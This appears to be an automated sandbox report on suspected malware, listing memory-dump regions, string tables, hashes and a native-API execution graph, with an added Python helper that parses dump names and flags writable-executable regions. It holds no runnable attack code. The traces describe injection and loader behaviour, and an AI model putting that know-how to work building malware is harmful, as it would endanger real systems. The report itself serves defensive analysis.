                                                                          • Instruction Fuzzy Hash: DB415EB6A087059FD700CF29C484A16BBE5BF89354F04492EF588DB740D771E909CB96
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: faa198a502570947f4ff5b9cc1742438b465ea124d052233bb995913164d39fa
                                                                          • Instruction ID: b9acc7fdd9201a71b29c880276bbbfb74fa3944c81adfca0912528e243e02d62
                                                                          • Opcode Fuzzy Hash: faa198a502570947f4ff5b9cc1742438b465ea124d052233bb995913164d39fa
                                                                          • Instruction Fuzzy Hash: 03410921A082F14ED71E875D48B9678BFD29F96201F4EC2EECADA5F3E3C5548448D760
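The function blocks above come from two memory dumps: process 7 at 0x36390000 ("based on PE: true", snapshot hcaresult_7_2_36390000_Anfrage) and process 8 at 0x02EB0000 ("based on PE: false", snapshot hcaresult_8_2_2eb0000_mrdYGoZBmXi, with Yara matches). The following Python is an added example, not Joe Sandbox code, that pulls the two "Source File" / "Snapshot File" pairs shown on this page apart and cross-checks them. The page itself confirms only three fields of the .sdmp name: the first is the process id, the second the snapshot iteration and the fourth the region base, because they agree with the hcaresult_<pid>_<iteration>_<base> snapshot names and the "Offset:" value. Reading the fifth field as a Win32 PAGE_* protection value (0x40 = PAGE_EXECUTE_READWRITE) is an assumption of this example, as is treating the zero-padded fields as hexadecimal; the third field and everything after the protection are kept raw because the report does not state their meaning.

```python
import re
from dataclasses import dataclass

# Win32 page-protection constants from winnt.h (low byte only).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

SOURCE_LINE_RE = re.compile(
    r"Source File:\s*(?P<name>[0-9A-Fa-f.]+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)
SNAPSHOT_LINE_RE = re.compile(
    r"Snapshot File:\s*hcaresult_(?P<pid>\d+)_(?P<iteration>\d+)_"
    r"(?P<base>[0-9A-Fa-f]+)_(?P<proc>[^.\s]+)\.jbxd"
)


@dataclass(frozen=True)
class DumpSource:
    pid: int
    iteration: int
    dump_id: str      # third field, meaning not stated in the report; kept raw
    base: int
    protect: int      # ASSUMPTION: fifth field is a Win32 PAGE_* value
    extra: tuple      # remaining fields, kept raw
    based_on_pe: bool

    @property
    def protect_name(self):
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:X}")

    @property
    def executable(self):
        return bool(self.protect & 0xF0)   # PAGE_EXECUTE* are 0x10..0x80

    @property
    def writable(self):
        return bool(self.protect & 0xCC)   # READWRITE / WRITECOPY variants


def parse_dump_name(name, based_on_pe=False):
    stem = name[:-len(".sdmp")] if name.endswith(".sdmp") else name
    fields = stem.split(".")
    if len(fields) != 8:
        raise ValueError(f"unexpected field count {len(fields)} in {name!r}")
    pid, iteration, dump_id, base, protect, *extra = fields
    # ASSUMPTION: zero-padded fields are hexadecimal. For the pids and iteration
    # seen here (7, 8, 2) hex and decimal agree; the base is hex per "Offset:".
    return DumpSource(int(pid, 16), int(iteration, 16), dump_id, int(base, 16),
                      int(protect, 16), tuple(extra), based_on_pe)


def parse_source_line(line):
    m = SOURCE_LINE_RE.search(line)
    if not m:
        raise ValueError(f"not a Source File line: {line!r}")
    dump = parse_dump_name(m["name"], based_on_pe=(m["pe"] == "true"))
    if dump.base != int(m["offset"], 16):
        raise ValueError("base in dump name disagrees with Offset:")
    return dump


def cross_check(source_line, snapshot_line):
    """Mismatches between a block's .sdmp name and its hcaresult_*.jbxd name."""
    dump = parse_source_line(source_line)
    m = SNAPSHOT_LINE_RE.search(snapshot_line)
    if not m:
        return ["snapshot line not recognised"]
    problems = []
    if dump.pid != int(m["pid"]):
        problems.append(f"pid {dump.pid} != snapshot pid {m['pid']}")
    if dump.iteration != int(m["iteration"]):
        problems.append(f"iteration {dump.iteration} != snapshot {m['iteration']}")
    if dump.base != int(m["base"], 16):
        problems.append(f"base 0x{dump.base:X} != snapshot 0x{int(m['base'], 16):X}")
    return problems


def triage(dump):
    """One-line reading of protection plus PE/non-PE content (example heuristic)."""
    if dump.executable and dump.writable and dump.based_on_pe:
        return "PE image in writable+executable memory: candidate injected/unpacked module"
    if dump.executable and dump.writable:
        return "writable+executable region without PE header: candidate shellcode stage"
    return "executable region" if dump.executable else "non-executable region"


# The two Source File / Snapshot File pairs as they appear on this page.
BLOCK_7 = (
    "Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true",
    "Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd",
)
BLOCK_8 = (
    "Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false",
    "Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd",
)

if __name__ == "__main__":
    for src, snap in (BLOCK_7, BLOCK_8):
        d = parse_source_line(src)
        print(f"pid {d.pid} iter {d.iteration} base 0x{d.base:X} {d.protect_name} "
              f"pe={d.based_on_pe} extra={d.extra}")
        print("   ", triage(d), "| mismatches:", cross_check(src, snap))
```

Run as a script it reports both regions as PAGE_EXECUTE_READWRITE with no mismatches between dump name and snapshot name; the process 7 region carries a PE header, the process 8 region does not, which is the distinction the Yara-matched block above is making.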
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bc37be71872559968c876f7355181d4f478997d1ba86b329ab1054ad09bb0967
                                                                          • Instruction ID: fc4ad7676e84c446df079a23109815f9a03360bef780f19e5634a436673f8998
                                                                          • Opcode Fuzzy Hash: bc37be71872559968c876f7355181d4f478997d1ba86b329ab1054ad09bb0967
                                                                          • Instruction Fuzzy Hash: 96F046F1D092886EEB02EB90CC88EEEBB79DF96345F0441CAE608A7181D6705999CB55
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 119182a48d8b336fb3b83eed3a3f8e2727e913e5492745b471c450537a124c4b
                                                                          • Instruction ID: 36403bb4239459ec2aa2360f9e624d0600eabfe4dee081f766bb346d434d60ec
                                                                          • Opcode Fuzzy Hash: 119182a48d8b336fb3b83eed3a3f8e2727e913e5492745b471c450537a124c4b
                                                                          • Instruction Fuzzy Hash: 19F015B6200209BBDB50EF99DC81EDB77ADEFC9750F408019BA19A7241DB70B9518BB0
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e252e55ccb57835924ee9dd489f92114c83014b6ee060e25234b931eaec4e401
                                                                          • Instruction ID: 225c2b222e099293bd12eac94ee999c7c3a07e360ef846d41f75e8590f0603b1
                                                                          • Opcode Fuzzy Hash: e252e55ccb57835924ee9dd489f92114c83014b6ee060e25234b931eaec4e401
                                                                          • Instruction Fuzzy Hash: D5E065B2240704BBD614EE59DC41FDB73ADEF89710F408019FA08A7241CB70B9108BB5
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a56f1866bdde1c370606ddf9861883a8ad16d0273c50ecff81ed478c0b507299
                                                                          • Instruction ID: 0fc144840b02341f1b9da70a5a736f6f7a2c15b730b369dc99f8900bd6c022f5
                                                                          • Opcode Fuzzy Hash: a56f1866bdde1c370606ddf9861883a8ad16d0273c50ecff81ed478c0b507299
                                                                          • Instruction Fuzzy Hash: E1F08271D0520CEBDB14CFA8D841BDDBBB4EF04360F2047AAE9289B380E6359754CB81
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c8d1f4c9ba52db7abdd4ae137ef888bfbdfdfd3410c86f36b598fed1662841bf
                                                                          • Instruction ID: 661bca7f9a31b452a28c05477749604f939c7768e46b19868ecff07fd52b622b
                                                                          • Opcode Fuzzy Hash: c8d1f4c9ba52db7abdd4ae137ef888bfbdfdfd3410c86f36b598fed1662841bf
                                                                          • Instruction Fuzzy Hash: 47E04F72B0121427C622658A9C05FDBB76DDFC2FA0F158064FF089B241E661A91286F5
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c905f44caec6e597b22e5033886ab0628b0eb5b982a68d8ff0538165d75b1df2
                                                                          • Instruction ID: c841ef6aef5b7bdc9659c4de52f8a015e2010aeaa9827a2fdb640791eadea237
                                                                          • Opcode Fuzzy Hash: c905f44caec6e597b22e5033886ab0628b0eb5b982a68d8ff0538165d75b1df2
                                                                          • Instruction Fuzzy Hash: 48E0DF739081126ECB101AAC6C4488AFB99EEC93B03390322F5AC97290EA328442C7E0
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ab2fe83bc1f1512700e73b33eff151b72e072fa436cb93eb6435babd6c785851
                                                                          • Instruction ID: 3928d4a7378a0dc05b26f172a864bcaa60face4f8d9fa86f955868ef0dd649ce
                                                                          • Opcode Fuzzy Hash: ab2fe83bc1f1512700e73b33eff151b72e072fa436cb93eb6435babd6c785851
                                                                          • Instruction Fuzzy Hash: 02E046362402047BD620AA5ACC01FDBB76DDFC6754F80841AFA08B7241D770B9108BB0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                          • API String ID: 0-3248090998
                                                                          • Opcode ID: 3e9063cd326aa29324555addc1031728d80d4e388c95b62d9b45e758207ec7cc
                                                                          • Instruction ID: ea3a9ec405ad4a2fa08c9aaa56ed645febfd4b4fb71224c50c3cc8e6dafe50b3
                                                                          • Opcode Fuzzy Hash: 3e9063cd326aa29324555addc1031728d80d4e388c95b62d9b45e758207ec7cc
                                                                          • Instruction Fuzzy Hash: 97910EF09052998ADB118F59A4603DEBF71BB85304F1581E9C7A97B203C3BE4E86CF90
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                          • API String ID: 0-3248090998
                                                                          • Opcode ID: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                                          • Instruction ID: 20243457d18c554189dd73b123dcf93a80d4a47e16c77d02b800348de6daaf62
                                                                          • Opcode Fuzzy Hash: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                                          • Instruction Fuzzy Hash: 9591FDF08052A98ADB118F55A4603DFBF71BB85304F1581E9C6AA7B243C3BE4E85DF90
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                          • API String ID: 0-1002149817
                                                                          • Opcode ID: cd70124be91b6f14499efb0fc7ea529a741681d0ddee5d92af633f7fb8563b03
                                                                          • Instruction ID: 942dc97e51742b4b57b3e7598af71233570f29445f4b53b25dd06625b8214ad8
                                                                          • Opcode Fuzzy Hash: cd70124be91b6f14499efb0fc7ea529a741681d0ddee5d92af633f7fb8563b03
                                                                          • Instruction Fuzzy Hash: 7DC13FB1D112689AEF21DFA5CC44BEEBBB9AF05344F1081DAD60CB7241E7B54A88CF51
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $2$Fn$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                          • API String ID: 0-1974708346
                                                                          • Opcode ID: d08ec94afe836715aad5cb20cedae4cdef8fbffd0b3810b548a9bc39ce885ff1
                                                                          • Instruction ID: 6de77e6d28ca9c916f15b0c03001682370180fbcde6a988d68d6c488fb4ef541
                                                                          • Opcode Fuzzy Hash: d08ec94afe836715aad5cb20cedae4cdef8fbffd0b3810b548a9bc39ce885ff1
                                                                          • Instruction Fuzzy Hash: 93915FB1D00218AAEF21DF95CC41FEEB7BDEF45344F4041A9EA0CA6140EB715B898FA1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                          • API String ID: 0-392141074
                                                                          • Opcode ID: 6affe173b9e1d84337708409cc17e9545df17ec4a6ed5b1fc74b2cb73ac57161
                                                                          • Instruction ID: 6fe85b41334a53cbda3f203d0e557cdee8a68a17e3bd399440e4b0c0076036e8
                                                                          • Opcode Fuzzy Hash: 6affe173b9e1d84337708409cc17e9545df17ec4a6ed5b1fc74b2cb73ac57161
                                                                          • Instruction Fuzzy Hash: 0D715EB1D10718AEEF21EF95CC40FEEB7BDAF48705F048199E609A6150EB705B488FA1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                          • API String ID: 0-392141074
                                                                          • Opcode ID: 4e6e51a45043f2c519f4d4f466302882e26dee951a993f6ca79f7bcfc44b65a2
                                                                          • Instruction ID: 502a4fce7f72ff95aa1461160d2384e78451a79d314f9428374c925a434657fd
                                                                          • Opcode Fuzzy Hash: 4e6e51a45043f2c519f4d4f466302882e26dee951a993f6ca79f7bcfc44b65a2
                                                                          • Instruction Fuzzy Hash: 21614BB1D10718AEEF21DFA5CC80FEEB7BDAF48705F048199E609A6150EB7157488FA1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                          • API String ID: 0-685823316
                                                                          • Opcode ID: 5e3a93e1ad9d1c71e518a7ff3fc9cc6f03b25d7c7fb960e2b581519f32bfb531
                                                                          • Instruction ID: 1f66145d97b60fcdb32b06972335b8dc54aa4c196fb190e85ebc4d974426b44d
                                                                          • Opcode Fuzzy Hash: 5e3a93e1ad9d1c71e518a7ff3fc9cc6f03b25d7c7fb960e2b581519f32bfb531
                                                                          • Instruction Fuzzy Hash: 612180B1D40218AAEF54DFE4CC44FEEBBB9AF08744F10815DE618BA180DBB55648CFA5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                          • API String ID: 0-685823316
                                                                          • Opcode ID: 87575919c793f11ca9e3be101b9a5f20f4909e311324e2b03a690150a0288eff
                                                                          • Instruction ID: 8a4d05004240dec75ca70f2745207b4953743b70cfba0961aa15818fff075b57
                                                                          • Opcode Fuzzy Hash: 87575919c793f11ca9e3be101b9a5f20f4909e311324e2b03a690150a0288eff
                                                                          • Instruction Fuzzy Hash: 8F317EB1D50218AAEF54DF90CC85FEEBBB9AF08744F108158F618BA180DBB51648CFA5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: :$:$:$A$I$N$P$m$s$t
                                                                          • API String ID: 0-2304485323
                                                                          • Opcode ID: 300379ae66a6c4f771be8197b611a3df7d1896287248f66661e15edc0b1a9483
                                                                          • Instruction ID: 72dad04a76ea63b3a9fe19db5b3e24be409692a9748d82d4793b88f8b89ef76f
                                                                          • Opcode Fuzzy Hash: 300379ae66a6c4f771be8197b611a3df7d1896287248f66661e15edc0b1a9483
                                                                          • Instruction Fuzzy Hash: BAD1F6F1A10704ABDB10DFA5CC81FEFB7B9AF58344F00492DE219E6240EB79A945CB65
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2eb0000_mrdYGoZBmXi.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .$P$e$i$m$o$r$x
                                                                          • API String ID: 0-620024284
                                                                          • Opcode ID: 13d1da38379c5696f61a610b379d860aaa9b427556bfb14acd389dceba30f682
                                                                          • Instruction ID: 680d4b6af1a63aedf6d75c840bb976f947a2ac477a41e4c2c8e3566edeffdd3f

                                                                          Execution Graph

                                                                          Execution Coverage:1.5%
                                                                          Dynamic/Decrypted Code Coverage:5.6%
                                                                          Signature Coverage:0.9%
                                                                          Total number of Nodes:323
                                                                          Total number of Limit Nodes:52
97253 28e8d10 LdrInitializeThunk 97252->97253 97254 28d5c6e 97252->97254 97253->97254 97254->97218 97255->97227 97257 28d599b 97256->97257 97259 28d59b7 97256->97259 97258 28d81e0 LdrInitializeThunk 97257->97258 97257->97259 97258->97257 97259->97236 97260->97240 97261->97244 97262->97249 97263 28e1421 97275 28e9380 97263->97275 97265 28e1475 97269 28e9530 NtClose 97265->97269 97266 28e1460 97268 28e9530 NtClose 97266->97268 97267 28e1442 97267->97265 97267->97266 97270 28e1469 97268->97270 97272 28e147e 97269->97272 97271 28e14b5 97272->97271 97273 28eb630 RtlFreeHeap 97272->97273 97274 28e14a9 97273->97274 97276 28e942a 97275->97276 97278 28e93ae 97275->97278 97277 28e9440 NtReadFile 97276->97277 97277->97267 97278->97267 97279 28e1bb9 97280 28e1bbf 97279->97280 97281 28e9530 NtClose 97280->97281 97283 28e1bc4 97280->97283 97282 28e1be9 97281->97282 97284 28d5cb0 97285 28d81e0 LdrInitializeThunk 97284->97285 97286 28d5ce0 97284->97286 97285->97286 97288 28d5d0c 97286->97288 97289 28d8160 97286->97289 97290 28d81a4 97289->97290 97295 28d81c5 97290->97295 97296 28e8810 97290->97296 97292 28d81b5 97293 28d81d1 97292->97293 97294 28e9530 NtClose 97292->97294 97293->97286 97294->97295 97295->97286 97297 28e888d 97296->97297 97299 28e883b 97296->97299 97301 3374650 LdrInitializeThunk 97297->97301 97298 28e88b2 97298->97292 97299->97292 97301->97298 97302 28d0ef0 97303 28d0f00 97302->97303 97304 28d4650 LdrLoadDll 97303->97304 97305 28d0f27 97304->97305 97306 28d0f73 97305->97306 97307 28d0f60 PostThreadMessageW 97305->97307 97307->97306 97308 28e61f0 97309 28e624a 97308->97309 97311 28e6257 97309->97311 97312 28e3c00 97309->97312 97313 28eb5a0 NtAllocateVirtualMemory 97312->97313 97315 28e3c41 97312->97315 97313->97315 97314 28e3d4e 97314->97311 97315->97314 97316 28d4650 LdrLoadDll 97315->97316 97318 28e3c87 97316->97318 97317 28e3cd0 Sleep 97317->97318 97318->97314 97318->97317 97319 28e8af0 97320 28e8b0d 97319->97320 97323 3372df0 LdrInitializeThunk 97320->97323 
97321 28e8b35 97323->97321 97324 28e1c30 97329 28e1c49 97324->97329 97325 28e1cd9 97326 28e1c91 97327 28eb630 RtlFreeHeap 97326->97327 97328 28e1ca1 97327->97328 97329->97325 97329->97326 97330 28e1cd4 97329->97330 97331 28eb630 RtlFreeHeap 97330->97331 97331->97325 97332 28ec730 97333 28eb630 RtlFreeHeap 97332->97333 97334 28ec745 97333->97334 97335 28e8970 97336 28e8a02 97335->97336 97338 28e899e 97335->97338 97340 3372ee0 LdrInitializeThunk 97336->97340 97337 28e8a33 97340->97337

                                                                          Control-flow Graph
                                                                          [Basic-block graph for the function at 028C9EA0 omitted: the original is an edge list that is not readable as text. Blocks span 028C9EA0-028CA82E; the only call out of the function is to 028EB290, made from the block at 028CA72E.]
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ~$#$'$($*s$7p$@$D$Ey$F$J$K$O$S@$S@$W\$X($\V$]$_;$h#$hr$o$v $vy$x$x$z${P$|$+$:$Z$j$q
                                                                          • API String ID: 0-4078000664
                                                                          • Opcode ID: e2694413127f3f163cb1071dfdf21176de8339634fa82c0befc09d5c22b5d3a8
                                                                          • Instruction ID: b7b2517c9fec691147c2632565e75fb07ab29a72709e91537605cd9c7618a3c7
                                                                          • Opcode Fuzzy Hash: e2694413127f3f163cb1071dfdf21176de8339634fa82c0befc09d5c22b5d3a8
                                                                          • Instruction Fuzzy Hash: 584294B8D0526CCBEB28CF54C9947DDBBB2BB45308F2085D9C50ABB285C7799A85CF41

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • NtCreateFile.NTDLL(?,5F8FFFB0,?,?,?,?,?,?,?,?,?), ref: 028E930E
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 2df1d9b015474010a9667e1f48030d82b39e4b8a0229bf0c848740eb48d4f5bc
                                                                          • Instruction ID: 8d46b351448b7f2f8b0beab27cb4e38bf09ceb6c0765efa2c258bb4173aa7f42
                                                                          • Opcode Fuzzy Hash: 2df1d9b015474010a9667e1f48030d82b39e4b8a0229bf0c848740eb48d4f5bc
                                                                          • Instruction Fuzzy Hash: 3131E6B9A00248AFCB14DF98C881EDEB7B9EF8D714F108219F909A7340D770A951CFA5

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • NtReadFile.NTDLL(?,5F8FFFB0,?,?,?,?,?,?,?), ref: 028E9469
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: 5b7998dfa1e579f5c837d53e03e5c1004f1e95ef4df3e0c3105228523c17caee
                                                                          • Instruction ID: 5acfed1b97fe05ebb55f42b19ff9d3b4ed7407580028b775e039a0f15ec5d6d8
                                                                          • Opcode Fuzzy Hash: 5b7998dfa1e579f5c837d53e03e5c1004f1e95ef4df3e0c3105228523c17caee
                                                                          • Instruction Fuzzy Hash: 2B31E9B9A00608AFDB14DF98D881EDFB7B9EF89714F108219FD19A7241D770A911CFA1

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • NtAllocateVirtualMemory.NTDLL(028D1ECE,5F8FFFB0,028E812F,00000000,00000004,00003000,?,?,?,?,?,028E812F,028D1ECE), ref: 028E9758
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateMemoryVirtual
                                                                          • String ID:
                                                                          • API String ID: 2167126740-0
